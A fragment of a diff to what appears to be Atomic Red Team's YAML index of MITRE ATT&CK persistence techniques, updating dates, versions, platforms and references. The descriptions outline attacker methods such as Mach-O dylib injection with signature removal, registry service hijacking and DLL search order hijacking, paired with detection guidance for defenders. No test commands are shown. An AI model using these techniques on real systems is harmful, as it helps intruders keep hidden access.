         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -58563,11 +58948,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -58625,9 +59009,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests:
     - name: ListCronjobs
@@ -58777,7 +59160,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests:
     - name: UEFI Persistence via Wpbbin.exe File Creation
@@ -58798,7 +59180,7 @@ persistence:
         elevation_required: true
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -58817,7 +59199,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -58831,7 +59212,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -58858,8 +59238,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -58890,7 +59270,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests:
     - name: Service Registry Permissions Weakness
@@ -59006,11 +59387,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -59082,9 +59462,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -59100,7 +59480,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests:
     - name: Add a driver
@@ -59170,7 +59549,7 @@ persistence:
         elevation_required: true
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -59245,7 +59624,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests:
     - name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -59356,7 +59734,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -59380,8 +59758,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -59536,7 +59912,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests:
     - name: Modify Fax service to run PowerShell
@@ -59748,26 +60123,7 @@ persistence:
         elevation_required: true
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -59784,6 +60140,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -59794,9 +60151,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -59804,8 +60165,24 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -59924,11 +60301,15 @@ persistence:
           '
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -59936,74 +60317,68 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests:
     - name: Office Application Startup - Outlook as a C2
@@ -60027,7 +60402,7 @@ persistence:
         name: command_prompt
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -60057,6 +60432,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -60067,6 +60443,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -60075,13 +60452,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -60123,9 +60500,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests:
     - name: Azure AD - Add Company Administrator Role to a user
@@ -60316,7 +60690,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests:
     - name: Print Processors
@@ -60356,14 +60729,14 @@ persistence:
         elevation_required: true
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -60379,8 +60752,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -60394,7 +60767,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -60420,6 +60793,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -60447,7 +60824,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests:
     - name: DLL Search Order Hijacking - amsi.dll
@@ -60516,37 +60892,7 @@ persistence:
         elevation_required: true
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -60561,13 +60907,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -60575,11 +60926,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests:
     - name: Code Executed Via Excel Add-in File (XLL)
@@ -60840,7 +61214,7 @@ persistence:
